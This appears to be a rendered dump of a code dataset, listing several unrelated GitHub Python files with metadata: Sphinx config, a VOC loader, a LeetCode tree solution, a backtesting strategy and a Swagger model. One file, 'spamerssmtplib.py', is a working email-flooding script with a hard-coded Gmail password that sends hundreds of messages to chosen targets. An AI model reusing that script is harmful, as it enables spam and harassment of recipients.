# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'instagram_private_api.tex', u'instagram\\_private\\_api Documentation',
u'ping', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'instagram_private_api', u'instagram_private_api Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'instagram_private_api', u'instagram_private_api Documentation',
author, 'instagram_private_api', 'One line description of project.',
'Miscellaneous'),
]
| [
"lastmodified@gmail.com"
] | lastmodified@gmail.com |
907ddd347c0090667ae70ccc22d09331b3f37284 | e4d66b0fc0ce10ec815ac1655660899645aac65c | /spamerssmtplib.py | c6843e5ced60ee05e9f1b64aa22dd569c5a72dd1 | [] | no_license | alipbudiman/spam-email-with-smtplib | 4d4d852580006ebbcce1e29afb670e23d1cde71d | 2079093a1e51578f285d3bca9eae9bd77a8055aa | refs/heads/main | 2023-05-24T09:32:07.679788 | 2021-06-06T08:43:00 | 2021-06-06T08:43:00 | 374,305,444 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | import smtplib, random
from random import randint
msg_2 = ["write your message here","you can write another message"]#<< write your message here
email_main = "xx@gmail.com"#<< imput your gmail here
email_to = ["xx@gmail.com"]#<< imput your email direction here, you can imput multiple image
total_email=300#<< total email you want to send / spams
print("Ongoing send "+str(total_email)+" Emails")
count = 0
server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
for x in range(total_email):
msg = random.randint(0,500000000000)
msg2 = random.choice(msg_2)
server.login(email_main,"123456alif")
server.sendmail(email_main,
email_to,
str(msg2)+str(msg))
count +=1
print("sending mail total: "+str(count)+"\nleft mail: "+str(total_email-count)+"\nMessage: "+msg2+str(msg))
server.quit()
| [
"noreply@github.com"
] | noreply@github.com |
77a6b962b0c5fbed8dfb17965ca021e16a2acc41 | 4cbda64e52e82d3f5b3e301505cfb246a5fd052d | /wrinkler/datasets/voc.py | b8c8c783054c80b8bd2e84ad98016c4d734458f9 | [
"MIT"
] | permissive | brandongk-ubco/wrinkler | d4b5f5d449cf6af155bf11991b8e619f4f30dcd2 | 79090c42849a2db77997bcd9171d6d885cc45d4f | refs/heads/main | 2023-02-24T17:48:12.489824 | 2021-01-25T04:34:22 | 2021-01-25T04:34:22 | 329,793,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import torchvision
from .AugmentedDataset import AugmentedDataset
dataset_path = "/mnt/e/datasets/voc/"
train_data = torchvision.datasets.VOCSegmentation(dataset_path,
image_set='train')
val_data = torchvision.datasets.VOCSegmentation(dataset_path,
image_set='trainval')
class VOCAugmentedDataset(AugmentedDataset):
def __getitem__(self, idx):
image, mask = super().__getitem__(idx)
mask[mask > 0] = 1.
return image, mask
| [
"brandongk@alumni.ubc.ca"
] | brandongk@alumni.ubc.ca |
50ed4d571f14e93304d24a9b7773420b866e91f7 | 4bc8afa94f6d36d582962f8ccfd3537cfcf79e0c | /tree/101.py | f5798150d3306542d6f827f1f7308009d499089d | [] | no_license | hellozgy/leetcode | c641dfa363cd97ece38b843acd4adbc4c1004173 | 7d3bacf0185920ffb8985bb998e3d344d57356fd | refs/heads/master | 2021-05-03T09:07:29.414338 | 2018-08-12T03:58:43 | 2018-08-12T03:58:43 | 120,570,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
#方案一:
'''
class Solution(object):
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None :return True
return self.t(root.left, root.right)
def t(self, p, q):
if p==None and q==None :return True
if p==None and q!=None :return False
if p!= None and q==None :return False
if p.val != q.val:return False
return self.t(p.left, q.right) and self.t(p.right, q.left)
'''
#方案二
class Solution(object):
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None:return True
l1, l2 = [root.left],[root.right]
while len(l1)>0 :
lnode = l1.pop(0)
rnode = l2.pop(0)
if lnode is None and rnode is None:continue
if (lnode is not None and rnode is None) or (lnode is None and rnode is not None):return False
if lnode.val != rnode.val :return False
l1.append(lnode.left)
l1.append(lnode.right)
l2.append(rnode.right)
l2.append(rnode.left)
return True | [
"1243268625@qq.com"
] | 1243268625@qq.com |
1c0e6abebd13774f2c7c79c4f287a4bc6c478dcb | f5159b2388d84022e38a52fccd0118f49679f0ae | /algofinance/backtester/strategy_example.py | 20c399c947d5bb19ab1879d38b1653cb01a91b1e | [
"MIT"
] | permissive | maxmhuggins/algofinance | e7569a8293e531aad794e734c833b5f3c3b48ae0 | 2eb1b3c0cb450d405cd297eaa7d18e956cad0700 | refs/heads/master | 2023-06-24T12:00:33.803241 | 2021-07-24T02:06:40 | 2021-07-24T02:06:40 | 345,828,167 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,047 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 3 08:10:57 2021
@author: maxmhuggins
"""
from algofinance.generalanalysis.datareader import DataReader as dr
import backtester as bt
# import datareader as dr
import matplotlib.pyplot as plt
class ExampleStrategy:
def __init__(self, closes, dates, symbol):
self.Closes, self.Dates, self.Symbol = closes, dates, symbol
self.HowSmooth = 5
self.StartingBalance = 10000000
self.StrategyName = ('Under Average Buyer,'
+ 'Over Average Seller (Example)')
self.Indicators = [self.indicator]
self.BackTester = bt.BackTester(self.Closes,
self.Dates,
self.StartingBalance,
self.strategy,
symbol=self.Symbol,
strategy_name=self.StrategyName,
indicators=self.Indicators,
path='./figures/')
def moving_average(self, start, end):
timespan = range(start, end)
summer = 0
if any(element < 0 for element in timespan):
average = 0
else:
for i in timespan:
summer += self.Closes[i]
average = summer / len(timespan)
return average
def strategy(self, optimizing_parameter=None):
if optimizing_parameter is None:
optimizing_parameter = self.HowSmooth
backtester = self.BackTester
percent = .25
moving_averages = []
for i in range(0, len(self.Closes)):
close = self.Closes[i]
average = self.moving_average(i - optimizing_parameter, i)
moving_averages.append(average)
positions = backtester.NumberOfPositions
if positions == 0:
if close < average:
backtester.buy(percent, i)
else:
pass
elif positions > 0:
if close > average:
backtester.sell(i)
self.MovingAverageValues = moving_averages
def indicator(self):
backtester = self.BackTester
plt.plot(backtester.Dates, self.MovingAverageValues,
color='magenta', label='Moving Average',
linewidth=backtester.Width)
if __name__ == '__main__':
start = '2021-03-02'
end = '2021-03-05'
symbol = 'BTCUSDT'
dates = (start, end)
BTC = dr.DataReader(symbol, 'binance', dates, tick='1d')
Strat = ExampleStrategy(BTC.Closes, BTC.Dates, symbol)
# Strat.BackTester.runner()
optimize_range = range(1, 10)
for i in optimize_range:
Strat.HowSmooth = i
Strat.BackTester.runner()
plt.scatter(optimize_range, Strat.BackTester.Gains, marker='x')
plt.plot(optimize_range, Strat.BackTester.Gains, lw=.5)
# Strat.BackTester.optimizer()
| [
"max.huggins98@gmail.com"
] | max.huggins98@gmail.com |
b0ad500120f8469b888e170431f17043052f3e7c | d57148c74b79954ff762ce3a02c1b0ef3e79d6a1 | /libs/smartmeshsdk-REL-1.3.0.1/libs/VManagerSDK/vmanager/models/net_reset_info.py | f58017d71ca05bfc882e34f73a9d91a3d9409ea4 | [
"BSD-3-Clause"
] | permissive | realms-team/solmanager | 62fb748b140361cf620b7dd8ff6df755afd42bbe | 95fa049df041add5f8d37c053ef560d0e5d06dff | refs/heads/master | 2020-04-11T10:00:21.086457 | 2018-11-20T15:49:27 | 2018-11-20T15:49:27 | 40,271,406 | 0 | 0 | BSD-3-Clause | 2018-11-20T15:49:28 | 2015-08-05T22:15:39 | Python | UTF-8 | Python | false | false | 3,061 | py | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetResetInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
NetResetInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'reload': 'bool'
}
self.attribute_map = {
'reload': 'reload'
}
self._reload = None
@property
def reload(self):
"""
Gets the reload of this NetResetInfo.
reload configuration after reset
:return: The reload of this NetResetInfo.
:rtype: bool
"""
return self._reload
@reload.setter
def reload(self, reload):
"""
Sets the reload of this NetResetInfo.
reload configuration after reset
:param reload: The reload of this NetResetInfo.
:type: bool
"""
self._reload = reload
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"twatteyne@gmail.com"
] | twatteyne@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.